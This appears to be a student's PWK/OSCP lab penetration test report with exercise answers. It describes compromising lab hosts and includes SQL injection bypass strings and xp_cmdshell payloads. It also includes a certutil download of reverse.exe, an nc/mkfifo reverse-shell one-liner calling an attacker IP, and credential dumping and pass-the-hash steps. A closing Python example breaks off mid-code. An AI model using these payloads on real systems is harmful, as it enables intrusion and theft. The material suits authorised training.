PWK Lab

The penetration test report summarizes the findings from testing internal systems at Offensive Security Labs. Several vulnerabilities were identified, including outdated software, poor security configurations, and default credentials. These issues allowed the tester to gain administrative access on multiple systems by exploiting SQL injection flaws, using hard-coded credentials, and executing arbitrary code remotely. Privilege escalation on one system provided root access. The report details the methodology and results for each targeted host.

Uploaded by

dmetivier

OFFENSIVE SECURITY

Penetration Test Report for


Internal Lab
v.2.0

Copyright © 2022 Offensive Security Ltd. All rights reserved.


No part of this publication, in whole or in part, may be reproduced, copied, transferred or any other right reserved to its copyright owner,
including photocopying and all other copying, any transfer or transmission using any network or other means of communication, any
broadcast for distant learning, in any form or by any means such as any information storage, transmission or retrieval system, without
prior written permission from Offensive Security.

Table of Contents
Offensive Security Lab Penetration Test Report 2
1. Objective 2
2. Lab Network 2
3. Exercises 53
1 | Page
Offensive Security Lab Penetration Test Report
1. Objective
OS- was tasked with performing an internal penetration test against Offensive Security
Labs. An internal penetration test is a dedicated attack against internally connected
systems. The focus of this test is to perform attacks similar to those of a hacker and
attempt to infiltrate Offensive Security’s internal lab systems – the THINC.local and
xor.com domains. The overall objective was to evaluate the network, identify systems,
and exploit flaws while reporting the findings back to Offensive Security.

During the internal penetration test, several alarming vulnerabilities were identified
on Offensive Security’s network. While performing the attacks, OS- was able to gain
access to multiple machines, primarily due to outdated patches and poor security
configurations. During the testing, OS- had administrative-level access to multiple
systems. All systems were successfully exploited and access was gained.

2. Lab Network
Offensive Security Complete Guide machines (alpha and beta) may not be included in
your lab report; they are for demonstration purposes only.
10.11.1.222

Enumeration
The initial nmap scan reveals several open ports; our attack surface is port 1512,
which runs the Oracle TNS listener, and port 8080, which is an Apache Tomcat
web server.
Directory bruteforcing Apache Tomcat reveals the /blog/login.jsp directory, which is a login
page.
Initial access

Passing a single quote in the username field produces an error page that discloses the
Oracle SQL database username, password and database name.
Using these credentials we attempt to log into the Oracle TNS listener using sqlplus and we
get a SQL shell.
Using this SQL shell we first dump the table names and then the usernames and passwords of
the users and admin.
To dump table names we use the query “SELECT owner, table_name FROM all_tables;”
Two tables named WEB_USERS and WEB_ADMIN hold the user and admin credentials
respectively.
Cracking the admin credential with the web application crackstation.net reveals the
admin password to be “adminadmin”.

Using the WEB_USERS credentials we log into the login page at /blog/login.jsp
Username: eric
Password: thisismypassword

The Admin login button on the page redirects us to /blog/adminlogin.jsp.
We use the admin credentials from the WEB_ADMIN table we dumped earlier.
Username: admin
Password: adminadmin
After logging in we get a portal to upload files. Taking advantage of this feature we
upload a JSP reverse shell.
This JSP reverse shell can be found at
https://raw.githubusercontent.com/LaiKash/JSP-Reverse-and-Web-Shell/main/shell.jsp.

Uploading the reverse shell.
After uploading the reverse shell we get code execution on the server. Through this
code execution we get a reverse shell as nt authority\system by injecting a PowerShell
base64-encoded payload.

Post-Exploitation
10.11.1.128

Enumeration

The initial nmap scan reveals several ports; port 4167, on which an IIS HTTP server is running,
will be our entry point.

Directory bruteforcing reveals the /login.asp directory, which has a login panel.
Initial Foothold

The login panel is vulnerable to SQL injection: by using “' OR 1=1;--” in the
username and password fields we can bypass the login screen.
The two input fields “Artist Name” and “Song Name” are also vulnerable to SQL injection. By
enabling xp_cmdshell with this set of payloads:
'EXEC sp_configure 'show advanced options',1;--
'RECONFIGURE;--
'EXEC sp_configure 'xp_cmdshell',1;--
'RECONFIGURE;--
we can get code execution on the server.
To get remote code execution we first create a reverse shell executable using
msfvenom,

and start a Python http.server.
To get a reverse shell we execute the following payload in one of the input fields on the
webpage:
alice' EXEC xp_cmdshell 'certutil.exe -urlcache -f http://192.168.119.148/reverse.exe
reverse.exe';--

And we get a reverse shell as nt authority\system.

Post-Exploitation
10.11.1.133
Enumeration

Bruteforcing directories shows a test.asp file.

Browsing to and inspecting test.asp in the browser shows that it imports a script from hidd3n-script.

Searching the hidd3n-script directory on the server shows obfuscated JavaScript code.
De-obfuscating the code with deobfuscate.io shows the contents of the code.

After understanding the code we can infer that it just creates an image tag with source
1f2e73705207bdd6467e109c1606ed29-21213/offsecphun1.gif.
The deobfuscated code contains the names of lots of other gif, png and bmp files. Trying
each one of them, we land on offsecphun5.bmp; after requesting it we get
redirected to http://10.11.1.133/1f2e73705207bdd6467e109c1606ed29-21213/111111111/1.jpeg

Bruteforcing directories under /1f2e73705207bdd6467e109c1606ed29-21213/111111111/
reveals an index folder with a login page.
Initial Access

During the dirsearch run there was a mention of install.txt; browsing to it shows an installation text
file.

From the file, a simple Google search for SiTeFiLo exploits reveals an EDB exploit:
Simple Text-File Login script (SiTeFiLo) 1.0.6 - File Disclosure / Remote File Inclusion -
PHP webapps Exploit (exploit-db.com)
Browsing for slog_users.txt reveals user IDs and passwords.

Using the other RFI vulnerability, we can execute a PHP reverse shell on the server.
Got a reverse shell as user www-data.

Enumerating users from the /etc/passwd file reveals that there is a user named kibosh whose
password was in the password file above.
Changing user from www-data to kibosh using the su command and entering the
password from the password file grants us a shell as kibosh.

Privilege Escalation
After further enumeration it is found that kibosh has rights to run ALL:ALL
commands.
So, abusing this privilege, we get a root shell with sudo su.

Post exploitation.

10.11.1.101
Initial enumeration

Browsing to 10.11.1.101 shows a webpage with “try harder” images. On
the Contact Us page there are names of people working in the company in different
positions: the names, emails and birth years of the employees.

Directory bruteforcing shows a /passwords/ directory on the web server.
Exploring the directory reveals 4 files named after the employees listed
on the Contact Us page.
Opening Alfred-pas.html reveals a page with a password box.

The password hint says that the year of birth is the password, so going back to the Contact
Us page we can see that Alfred was born in 1988. Guessing the password “1988”
gives us access to the password-protected content.
On this page we can see that an SSH password, “IHopeThisDoesNotExpire”, is
disclosed for user Alfred. Using these credentials we log into the server as Alfred
successfully.

Initial Access

But our shell is restricted. To escape the restricted shell we use the “-t bash --noprofile” flag.

In the home directory there is a README file. This file mentions that there may be a
Docker container running on the system.
Privilege Escalation
Running the linpeas.sh privilege escalation script we can see that the /var/run/docker.sock
file is writable, which can pave our way to the root account.

Using the writable socket to start an Ubuntu container and chrooting back
into the host’s “/bin/bash”, we get root privileges.

Post-Exploitation
10.11.1.115
The Nmap scan reveals ports 21, 22, 80, 111, 139, 143, 199, 443, 3306 and 32768.

Enumerating port 139 with Metasploit’s auxiliary/scanner/smb/smb_version reveals that the
host is running Samba 2.2.7a.
Initial Access
Samba 2.2.7a is vulnerable to a remote buffer overflow for which an EDB
exploit is available: Samba < 2.2.8 (Linux/BSD) - Remote Code Execution - Multiple remote
Exploit (exploit-db.com), CVE-2003-0201.
Exploiting the vulnerability gives us a reverse shell as root.

Post exploitation
10.11.1.116
Nmap enumeration shows port 80 open along with 21, 22, 110 and 143. Port 80 runs an
Apache web server.

Bruteforcing the Apache web server directories we find /administrator/, which hosts Cuppa
CMS, and /db, which contains phpliteadmin.php (phpLiteAdmin v1.9.3, used to
manage SQLite databases).
The password for phpLiteAdmin is the default password “admin”. Upon logging in we can
create a PHP file with our desired payload to get a reverse shell, as described in the exploit
PHPLiteAdmin 1.9.3 - Remote PHP Code Injection - PHP webapps Exploit
(exploit-db.com), EDB-ID 24044.

In this exploit we first create a database and insert a table into it; then in the table
we insert our PHP code to get a reverse shell. In my case I used “<?php echo
shell_exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.119.215 139
>/tmp/f");?>”.
Even after creating this database file, in order to get a reverse shell we must be able to
browse to this file, but unfortunately it is not in the web server’s directory. In order to
access this database file we must chain a Remote/Local File Inclusion
vulnerability.
So, to get a reverse shell we chain the LFI vulnerability in Cuppa CMS: Cuppa CMS -
'/alertConfigField.php' Local/Remote File Inclusion - PHP webapps Exploit (exploit-db.com),
EDB-ID 25971.
We can see that the path to our reverse shell file is

So in order to access the file and get a reverse shell we use the payload
http://10.11.1.116/administrator/alerts/alertConfigField.php?urlConfig=/usr/local/databases/hack.php
and we get a reverse shell as www-data.
Further enumeration reveals that the host is using the OS

which is vulnerable to a kernel exploit that triggers a local privilege escalation
vulnerability:
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation - Linux local Exploit
(exploit-db.com), CVE-2017-16995

Downloading, compiling and running the exploit on the host allows us to gain root
privileges.
Post-Exploitation

10.11.1.120-123
This is an Active Directory network of machines with the domain name xor.com. In this set
10.11.1.120 is the domain controller and the other 3 machines are clients. Of these
3 clients we get our initial access from 10.11.1.123 and then move laterally to
compromise the domain controller.

10.11.1.123

Enumeration
The initial Nmap scan reveals that port 80, which will be of interest to us, is open.

Directory brute forcing on the HTTP server on port 80 reveals a /books directory.
Upon browsing the /books directory in our web browser we get the welcome page of the
“bizuno erp system”.
Initial Access

Guessing the credentials of this ERP as username “admin@xor.com” and password
“admin”, we get logged in.
A quick Google search reveals that bizuno library 3.1.7 is vulnerable to authenticated
remote code execution:
PhreeBooks 5.2.3 ERP - Remote Code Execution (2) - PHP webapps Exploit
(exploit-db.com), EDB-ID 49524.
Executing the exploit we get code execution on 10.11.1.123.
A reverse shell is gained through a PowerShell base64-encoded payload. Upon gaining the
reverse shell, further enumeration reveals that there is a cached TGS ticket for the MSSQL server
running on 10.11.1.121.
To dump these hashes we use the Invoke-Kerberoast.ps1 script.

Cracking this hash using hashcat we get the password “shantewhite”.

Post-exploitation
10.11.1.121

Initial Access
Using wmiexec to connect to 10.11.1.121 as sqlServer we get a shell on 10.11.1.121. Upon further
enumeration with mimikatz we dump the logon credentials and get the hash for
daisy.

Post-exploitation
10.11.1.122

After dumping the NTLM hash of daisy, we attempt a pass-the-hash attack on 10.11.1.122 as
user daisy using wmiexec.py.
After getting access to 10.11.1.122 as daisy we enumerate further and dump the
logon passwords again using mimikatz, and we get the NTLM hash of user David.

Post-Exploitation
10.11.1.120, the domain controller

Initial enumeration
The Nmap scan reveals that this is the domain controller; the scan of port 3389 shows that the
common name is xor-dc01.xor.com.

Using the David user’s NTLM hash from 10.11.1.121, we attempt to log into the domain
controller using wmiexec.py and get a shell as user David, who is a local administrator on
the domain controller.

Post-Exploitation
3. Exercises

2.4.3.4 Exercises
1. Use man to look at the man page for one of your preferred commands.

2. Use man to look for a keyword related to file compression.

3. Use which to locate the pwd command on your Kali virtual

4. Use locate to locate wce32.exe on your Kali virtual machine.

5. Use find to identify any file (not directory) modified in the last day, NOT owned by the root user
and execute ls -l on them. Chaining/piping commands is NOT allowed!

2.5.3 Exercises (Reporting is not required for these exercises)

2.6.6.1 Exercises (Reporting is not required for these exercises)

3.1.3.1 Exercises
1. Inspect your bash history and use history expansion to re-run a command from it.

2. Execute different commands of your choice and experiment browsing the history
through the shortcuts as well as the reverse-i-search facility.

3.2.5.1 Exercises

1. Use the cat command in conjunction with sort to reorder the content of the /etc/passwd file on
your Kali Linux system.

2. Redirect the output of the previous exercise to a file of your choice in your home
directory.
3.3.5.1 Exercises

1. Using /etc/passwd, extract the user and home directory fields for all users on your Kali machine
for which the shell is set to /bin/false. Make sure you use a Bash one-liner to print the output to
the screen.

2. Copy the /etc/passwd file to your home directory (/home/kali).

3. Use cat in a one-liner to print the output of the /kali/passwd and replace all
instances of the “Gnome Display Manager” string with “GDM”.

3.5.3.1 Exercises
1. Download the archive from the following URL
https://offensive-security.com/pwkfiles/scans.tar.gz
2. This archive contains the results of scanning the same target machine at different
times. Extract the archive and see if you can spot the differences by diffing the scans.

3.6.3.1 Exercises

1. Find files that have changed on your Kali virtual machine within the past 7 days by running a
specific command in the background.
2. Re-run the previous command and suspend it; once suspended, background it.

3. Bring the previous background job into the foreground.

4. Start the Firefox browser on your Kali system. Use ps and grep to identify Firefox’s PID.

5. Terminate Firefox from the command line using its PID.

3.7.2.1 Exercises

1. Start your apache2 web service and access it locally while monitoring its access.log file in
realtime.

2. Use a combination of watch and ps to monitor the most CPU-intensive processes on your Kali
machine in a terminal window; launch different applications to see how the list changes in real
time
Command:- watch -c -n 1 ps -eo pid,ppid,%mem,%cpu,comm --sort=-%cpu
3.8.3.1 Exercise

1. Download the PoC code for an exploit from https://www.exploit-db.com using curl, wget, and
axel, saving each download with a different name

3.9.3.1 Exercises
1. Create an alias named “..” to change to the parent directory and make it persistent across
terminal sessions.

2. Permanently configure the history command to store 10000 entries and include the full date
in its output.

4.2.4.1 Exercises
1. Use socat to transfer powercat.ps1 from your Kali machine to your Windows system. Keep the
file on your system for use in the next section.

• Listener started

• Establishing connection

2.Use socat to create an encrypted reverse shell from your Windows system to
your Kali machine.
• Generating certificate and key files on Kali Linux (attacker) and combining them into a
.pem file
• Starting Listener

• Initiating connection from target machine(windows) and receiving reverse shell

3. Create an encrypted bind shell on your Windows system. Try to connect to it from Kali
without encryption. Does it still work?
• Starting the listener on the target (Windows).

• Attempting to connect to the encrypted bind shell without encryption from the
attacker (Kali Linux).

• Conclusion: Does not connect to the encrypted bind shell.

4. Make an unencrypted socat bind shell on your Windows system. Connect to the shell using
Netcat. Does it work?
• Creating a bind shell listener using socat on the target (Windows).

• Attempting to connect to the socat bind shell listener using Netcat from the attacker (Kali
Linux) machine.

• Conclusion: Connection was successful.

4.3.8.1 Exercises
1. Use PowerShell and powercat to create a reverse shell from your Windows system to your
Kali machine.
• Powershell Reverse shell

• Powercat reverse shell

2. Use PowerShell and powercat to create a bind shell on your Windows system and connect to
it from your Kali machine. Can you also use powercat to connect to it locally?
• Powershell Bind shell

• Powercat Bind shell

• Can you also use powercat to connect to it locally?

• Ans: NO
3. Use powercat to generate an encoded payload and then have it executed through
powershell. Have a reverse shell sent to your Kali machine, also create an encoded bind shell
on your Windows system and use your Kali machine to connect to it.

• Powercat Encoded Reverse shell payload

• Powercat encoded bind shell

4.4.5.1 Exercises
1. Use Wireshark to capture network activity while attempting to connect to
10.11.1.217 on port 110 using Netcat, and then attempt to log into it.

2. Read and understand the output. Where is the three-way handshake happening? Where is
the connection closed?
• The three-way handshake happens in the very first 3 packets

• The connection is closed in the last 3 packets

3. Follow the TCP stream to read the login attempt.

4. Use the display filter to only monitor traffic on port 110.

5. Run a new session, this time using the capture filter to only collect traffic on port 110.
4.5.2.1 Exercises

1. Use tcpdump to recreate the Wireshark exercise of capturing traffic on port 110.

2. Use the -X flag to view the content of the packet. If data is truncated, investigate
how the -s flag might help.
Solution: Using the -X option we can see the packets in hex and ASCII. With the -s flag
(snaplen) we control how much of each packet is captured, and so how much is truncated in
the output; it takes a numerical value from 0 to 65535 for fine control over the amount of
data kept, and 0 means no truncation at all.

3. Find all ‘SYN’, ‘ACK’, and ‘RST’ packets in the password_cracking_filtered.pcap
file.
SYN packets

ACK packets

RST packets
RST packets

4. An alternative syntax is available in tcpdump where you can use a more user-friendly filter to
display only ACK and PSH packets. Explore this syntax in the tcpdump manual by searching
for “tcpflags”. Come up with an equivalent display filter using this syntax to filter ACK and
PSH packets.

Command: tcpdump -A 'tcp[tcpflags] & (tcp-ack|tcp-push) != 0' -r password_cracking_filtered.pcap -s 0
5.7.3.1 Exercises
1. Research Bash loops and write a short script to perform a ping sweep of your target IP
range of 10.11.1.0/24.

script:

#!/bin/bash
# Ping sweep of 10.11.1.0/24: one ICMP echo request per host with a one
# second timeout, printing the address of every host that replies.
for ((i=1; i<=254; i++)); do
    ip="10.11.1.$i"
    ping -c 1 -w 1 "$ip" | grep "64 bytes" | cut -d " " -f 4 | tr -d ":"
done
2. Try to do the above exercise with a higher-level scripting language such as Python, Perl,
or Ruby. Script (python):

#!/usr/bin/python3
import os

# Ping sweep of 10.11.1.0/24 using the system ping command; os.system()
# returns 0 only when the host answered the echo request.
for i in range(1, 256):
    ip = "10.11.1.%s" % i
    response = os.system("ping -c 1 -w 1 %s > /dev/null" % ip)
    if response == 0:
        print("%s UP" % ip)
    else:
        print("%s No response" % ip)

print("Ping sweep complete")
3. Use the practical examples in this module to help you create a Bash script that extracts
JavaScript files from the access_log.txt file
(http://www.offensive-security.com/pwkfiles/access_log.txt.gz). Make sure the file
names DO NOT include the path, are unique, and are sorted.
Script:- grep '\.js' access_log.txt | cut -d '/' -f 5 | awk '{print $1}' | sed '/\.css/d' | sort -u

4. Re-write the previous exercise in another language such as Python, Perl, or Ruby.
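A Python version of exercise 3, as an added example that is not part of the original report: it parses the request line properly instead of cutting on “/”, so nested paths, query strings and names such as data.json are handled. The log lines are constructed in the access_log.txt format; the real file is not embedded.

```python
#!/usr/bin/env python3
"""Unique, sorted JavaScript file names from Apache access-log lines (exercise 4 in Python)."""
import re
import sys
from posixpath import basename
from urllib.parse import urlsplit

# Common/combined log format: client ident user [timestamp] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: (?P<proto>[^"]+))?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample lines in the same format as access_log.txt (not taken from the real file).
SAMPLE_LOG = [
    '201.21.152.237 - - [25/Apr/2013:14:05:35 -0700] "GET /admin/js/jquery.js HTTP/1.1" 200 93611',
    '201.21.152.237 - - [25/Apr/2013:14:05:36 -0700] "GET /admin/js/jquery.js?ver=1.7 HTTP/1.1" 200 93611',
    '201.21.152.237 - - [25/Apr/2013:14:05:37 -0700] "GET /js/main.js HTTP/1.1" 304 -',
    '201.21.152.237 - - [25/Apr/2013:14:05:38 -0700] "GET /css/style.css HTTP/1.1" 200 1212',
    '201.21.152.237 - - [25/Apr/2013:14:05:39 -0700] "GET /api/data.json HTTP/1.1" 200 55',
    '201.21.152.237 - - [25/Apr/2013:14:05:40 -0700] "GET /static/a.js HTTP/1.1" 200 10',
    'this line is not in log format and must be skipped rather than crash the script',
]


def requested_path(line):
    """Return the request path of one log line, or None if the line does not parse."""
    match = LOG_RE.match(line)
    return match.group("path") if match else None


def js_files(lines):
    """Unique, sorted basenames of every requested .js file, with query strings stripped."""
    names = set()
    for line in lines:
        path = requested_path(line)
        if path is None:
            continue
        # Drop ?query and #fragment, then keep only the last path component (no directories).
        name = basename(urlsplit(path).path)
        # Exact extension test: a substring match like grep ".js" would also pick up
        # data.json or page.jsp, which the sed '/.css/d' step does not remove.
        if name.lower().endswith(".js"):
            names.add(name)
    return sorted(names)


if __name__ == "__main__":
    # Usage: script.py [access_log.txt]; without an argument the constructed sample is used.
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            found = js_files(fh)
    else:
        found = js_files(SAMPLE_LOG)
    for name in found:
        print(name)
```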

6.3.1.1 Exercise

1.Use the whois tool in Kali to identify the name servers of MegaCorp One.

6.4.1.1 Exercises
1. Who is the VP of Legal for MegaCorp One and what is their email address?

3. Use Google dorks (either your own or any from the GHDB) to search www.megacorpone.com for
interesting documents.

4. What other MegaCorp One employees can you identify that are not listed on
www.megacorpone.com?

Names: Gabriel Cook, William Adler, Javier Ruiz.

6.5.1.1 Exercise

1. Use Netcraft to determine what application server is running on www.megacorpone.com.

6.6.1.1 Exercise (Reporting is not required for this exercise)

6.7.1.1 Exercise
1. Search Megacorpone’s GitHub repos for interesting or sensitive information.

6.12.1.1 Exercises

1. Use theHarvester to enumerate email addresses for megacorpone.com.

2. Experiment with different data sources (-b). Which ones work best for you? Ans:
Google works best.
6.13.2.1 Exercise
1. Use any of the social media tools previously discussed to identify additional
MegaCorp One employees.

7.1.6.3 Exercises
1. Find the DNS servers for the megacorpone.com domain.

2. Write a small script to attempt a zone transfer from megacorpone.com using a
higher-level scripting language such as Python, Perl, or Ruby. Script:

#!/usr/bin/python3
# A simple function that finds NS records, resolves their IPs, and attempts a
# DNS zone transfer from each of them.
import dns.query
import dns.resolver
import dns.zone


def dns_zone_xfer(address):
    # Look up the authoritative name servers for the domain.
    ns_answer = dns.resolver.query(address, 'NS')
    for server in ns_answer:
        print("[*] Found NS: {}".format(server))
        # Resolve each name server to its address(es).
        ip_answer = dns.resolver.query(server.target, 'A')
        for ip in ip_answer:
            print("[*] IP for {} is {}".format(server, ip))
            try:
                # Ask that server for the whole zone (AXFR).
                zone = dns.zone.from_xfr(dns.query.xfr(str(ip), address))
                for host in zone:
                    print("[*] Found Host: {}".format(host))
            except Exception:
                # A correctly configured server refuses transfers to unknown hosts.
                print("[*] NS {} refused zone transfer!".format(server))
                continue


dns_zone_xfer('megacorpone.com')

# end of script

3. Recreate the example above and use dnsrecon to attempt a zone transfer from
megacorpone.com.
root@stu-1 ~/pen200/exercise dnsrecon -d megacorpone.com -axfr
[*] std: Performing General Enumeration against:
megacorpone.com...
[*] Checking for Zone Transfer for megacorpone.com name servers
[*] Resolving SOA Record
[+] SOA ns1.megacorpone.com 51.79.37.18
[*] Resolving NS Records
[*] NS Servers found:
[+] NS ns1.megacorpone.com 51.79.37.18
[+] NS ns3.megacorpone.com 66.70.207.180
[+] NS ns2.megacorpone.com 51.222.39.63
[*] Removing any duplicate NS server IP Addresses...
[*]
[*] Trying NS server 51.79.37.18
[+] 51.79.37.18 Has port 53 TCP Open
[-] Zone Transfer Failed (Zone transfer error: REFUSED)
[*]

[*] Trying NS server 51.222.39.63
[+] 51.222.39.63 Has port 53 TCP Open
[+] Zone Transfer was successful!!
[*] NS ns1.megacorpone.com 51.79.37.18
[*] NS ns2.megacorpone.com 51.222.39.63
[*] NS ns3.megacorpone.com 66.70.207.180
[*] TXT Try Harder
[*] TXT google-site-verification=U7B_b0HNeBtY4qYGQZNsEYXfCJ32hMNV3GtC0wWq5pA
[*] MX @.megacorpone.com fb.mail.gandi.net 217.70.178.216
[*] MX @.megacorpone.com fb.mail.gandi.net 217.70.178.217
[*] MX @.megacorpone.com fb.mail.gandi.net 217.70.178.215
[*] MX @.megacorpone.com spool.mail.gandi.net 217.70.178.1
[*] A admin.megacorpone.com 51.222.169.208
[*] A beta.megacorpone.com 51.222.169.209
[*] A fs1.megacorpone.com 51.222.169.210
[*] A intranet.megacorpone.com 51.222.169.211
[*] A mail.megacorpone.com 51.222.169.212
[*] A mail2.megacorpone.com 51.222.169.213
[*] A ns1.megacorpone.com 51.79.37.18
[*] A ns2.megacorpone.com 51.222.39.63
[*] A ns3.megacorpone.com 66.70.207.180
[*] A router.megacorpone.com 51.222.169.214
[*] A siem.megacorpone.com 51.222.169.215
[*] A snmp.megacorpone.com 51.222.169.216
[*] A support.megacorpone.com 51.222.169.218
[*] A syslog.megacorpone.com 51.222.169.217
[*] A test.megacorpone.com 51.222.169.219
[*] A vpn.megacorpone.com 51.222.169.220
[*] A www.megacorpone.com 149.56.244.87
[*] A www2.megacorpone.com 149.56.244.87
[*]
[*] Trying NS server 66.70.207.180
[+] 66.70.207.180 Has port 53 TCP Open
[-] Zone Transfer Failed (Zone transfer error: REFUSED)
[*] Checking for Zone Transfer for megacorpone.com name servers
[*] Resolving SOA Record
[+] SOA ns1.megacorpone.com 51.79.37.18
[*] Resolving NS Records
[*] NS Servers found:
[+] NS ns1.megacorpone.com 51.79.37.18
[+] NS ns3.megacorpone.com 66.70.207.180
[+] NS ns2.megacorpone.com 51.222.39.63
[*] Removing any duplicate NS server IP Addresses...
[*]
[*] Trying NS server 51.79.37.18
[+] 51.79.37.18 Has port 53 TCP Open
[-] Zone Transfer Failed (Zone transfer error: REFUSED)
[*]
[*] Trying NS server 51.222.39.63
[+] 51.222.39.63 Has port 53 TCP Open
[+] Zone Transfer was successful!!
[*] NS ns1.megacorpone.com 51.79.37.18
[*] NS ns2.megacorpone.com 51.222.39.63
[*] NS ns3.megacorpone.com 66.70.207.180
[*] TXT Try Harder
[*] TXT google-site-verification=U7B_b0HNeBtY4qYGQZNsEYXfCJ32hMNV3GtC0wWq5pA
[*] MX @.megacorpone.com fb.mail.gandi.net 217.70.178.216
[*] MX @.megacorpone.com fb.mail.gandi.net 217.70.178.215
[*] MX @.megacorpone.com fb.mail.gandi.net 217.70.178.217
[*] MX @.megacorpone.com spool.mail.gandi.net 217.70.178.1
[*] A admin.megacorpone.com 51.222.169.208
[*] A beta.megacorpone.com 51.222.169.209
[*] A fs1.megacorpone.com 51.222.169.210
[*] A intranet.megacorpone.com 51.222.169.211
[*] A mail.megacorpone.com 51.222.169.212
[*] A mail2.megacorpone.com 51.222.169.213
[*] A ns1.megacorpone.com 51.79.37.18
[*] A ns2.megacorpone.com 51.222.39.63
[*] A ns3.megacorpone.com 66.70.207.180
[*] A router.megacorpone.com 51.222.169.214
[*] A siem.megacorpone.com 51.222.169.215
[*] A snmp.megacorpone.com 51.222.169.216
[*] A support.megacorpone.com 51.222.169.218
[*] A syslog.megacorpone.com 51.222.169.217
[*] A test.megacorpone.com 51.222.169.219
[*] A vpn.megacorpone.com 51.222.169.220
[*] A www.megacorpone.com 149.56.244.87
[*] A www2.megacorpone.com 149.56.244.87
[*]
[*] Trying NS server 66.70.207.180
[+] 66.70.207.180 Has port 53 TCP Open
[-] Zone Transfer Failed (Zone transfer error: REFUSED)
[-] DNSSEC is not configured for megacorpone.com
[*] SOA ns1.megacorpone.com 51.79.37.18
[*] NS ns1.megacorpone.com 51.79.37.18
[*] NS ns3.megacorpone.com 66.70.207.180
[*] NS ns2.megacorpone.com 51.222.39.63
[*] MX mail.megacorpone.com 51.222.169.212
[*] MX mail2.megacorpone.com 51.222.169.213
[*] MX spool.mail.gandi.net 217.70.178.1
[*] MX fb.mail.gandi.net 217.70.178.215
[*] MX fb.mail.gandi.net 217.70.178.216
[*] MX fb.mail.gandi.net 217.70.178.217
[*] TXT megacorpone.com google-site-verification=U7B_b0HNeBtY4qYGQZNsEYXfCJ32hMNV3GtC0wWq5pA
[*] TXT megacorpone.com Try Harder
[*] Enumerating SRV Records
[+] 0 Records Found
[*] Saving records to XML file: fr

7.2.2.9 Exercises
1. Use Nmap to conduct a ping sweep of your target IP range and save the output to a file.
Use grep to show machines that are online.
2. Scan the IP addresses you found in exercise 1 for open webserver ports. Use
Nmap to find the webserver and operating system versions.

3. Use NSE scripts to scan the machines in the labs that are running the SMB service.

4. Use Wireshark to capture a Nmap connect and UDP scan and compare it against the Netcat
port scans. Are they the same or different?

Ans: The Netcat port scan and the Nmap connect scan are the same because both perform a
complete connection (SYN - SYN/ACK - ACK) with the target, which generates more traffic
than an Nmap stealth scan.

5. Use Wireshark to capture a Nmap SYN scan and compare it to a connect scan and identify
the difference between them.

Ans: The Nmap SYN (stealth) scan and the Nmap connect scan have one major
difference. In the stealth scan the connection made with the target is incomplete
(SYN - SYN/ACK - RST), which in turn reduces network traffic and speeds up the
scan.
Whereas in the connect scan a complete connection is made
(SYN - SYN/ACK - ACK), which generates a lot of network traffic and slows down
the scanning process.
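As an added example (not from the original report), the tcpflags filters from 4.5.2.1 exercises 3 and 4 and the SYN-scan versus connect-scan difference described in the two answers above, reimplemented in Python over a constructed capture: each TCP header is built with struct, the flag byte is read at offset 13 exactly as tcpdump’s tcp[tcpflags] does, and every flow is labelled by whether the client ever completed the handshake. The packet contents, port numbers and function names are my own assumptions.

```python
#!/usr/bin/env python3
"""TCP flag filters and SYN-scan vs connect-scan detection over a constructed capture.

tcpdump's tcp[tcpflags] is byte 13 of the TCP header; tcp-syn, tcp-ack, tcp-push and
tcp-rst are bit masks over that byte, so a BPF test such as
'tcp[tcpflags] & (tcp-ack|tcp-push) != 0' is a plain AND on a single byte.
"""
import struct

# Flag bits of TCP header byte 13 (the values behind tcpdump's tcp-fin, tcp-syn, ... names).
TCP_FIN, TCP_SYN, TCP_RST, TCP_PUSH, TCP_ACK = 0x01, 0x02, 0x04, 0x08, 0x10


def build_tcp_header(sport, dport, flags, seq=0, ack=0):
    """Construct a minimal 20-byte TCP header; sample data, not captured traffic."""
    data_offset = 5 << 4  # header length of 5 words, no options
    return struct.pack("!HHIIBBHHH", sport, dport, seq, ack, data_offset, flags, 8192, 0, 0)


def tcp_flags(header):
    """tcp[tcpflags]: the flag byte at offset 13 of the TCP header."""
    return header[13]


def matches(header, mask, exact=False):
    """The two filter shapes from the exercise: 'tcp[tcpflags] & mask != 0' (exact=False)
    or 'tcp[tcpflags] == mask' (exact=True, e.g. packets with only SYN set)."""
    flags = tcp_flags(header)
    return flags == mask if exact else (flags & mask) != 0


def filter_flags(headers, mask, exact=False):
    """Indices of the headers that satisfy the flag test."""
    return [i for i, h in enumerate(headers) if matches(h, mask, exact)]


def classify_flows(headers):
    """Label every (client port, server port) flow; the client is whoever sent the bare SYN.

    connect   : SYN, SYN/ACK, then an ACK from the client (nmap -sT, netcat)
    syn-scan  : SYN, SYN/ACK, then a RST from the client and never an ACK (nmap -sS)
    closed    : SYN answered by RST/ACK from the server
    incomplete: anything else (lost packets, truncated capture)
    """
    flows = {}
    for h in headers:
        sport, dport = struct.unpack("!HH", h[:4])
        flags = tcp_flags(h)
        if flags == TCP_SYN:  # first packet of a flow, sent by the client
            flows[(sport, dport)] = [("client", flags)]
        elif (dport, sport) in flows:  # server -> client
            flows[(dport, sport)].append(("server", flags))
        elif (sport, dport) in flows:  # client -> server
            flows[(sport, dport)].append(("client", flags))
    return {key: _label(pkts) for key, pkts in flows.items()}


def _label(pkts):
    if len(pkts) < 2 or pkts[1][0] != "server":
        return "incomplete"
    reply = pkts[1][1]
    if reply & TCP_RST:
        return "closed"
    if reply != TCP_SYN | TCP_ACK:
        return "incomplete"
    client_after = [f for who, f in pkts[2:] if who == "client"]
    if any(f & TCP_ACK and not f & TCP_RST for f in client_after):
        return "connect"
    if any(f & TCP_RST for f in client_after):
        return "syn-scan"
    return "incomplete"


def sample_capture():
    """Constructed capture: a full connect to POP3 (port 110), a half-open SYN probe of
    the same port, and a SYN to a closed port (111)."""
    return [
        build_tcp_header(40000, 110, TCP_SYN),             # connect scan: SYN
        build_tcp_header(110, 40000, TCP_SYN | TCP_ACK),   #   SYN/ACK
        build_tcp_header(40000, 110, TCP_ACK),             #   ACK completes the handshake
        build_tcp_header(110, 40000, TCP_PUSH | TCP_ACK),  #   server banner
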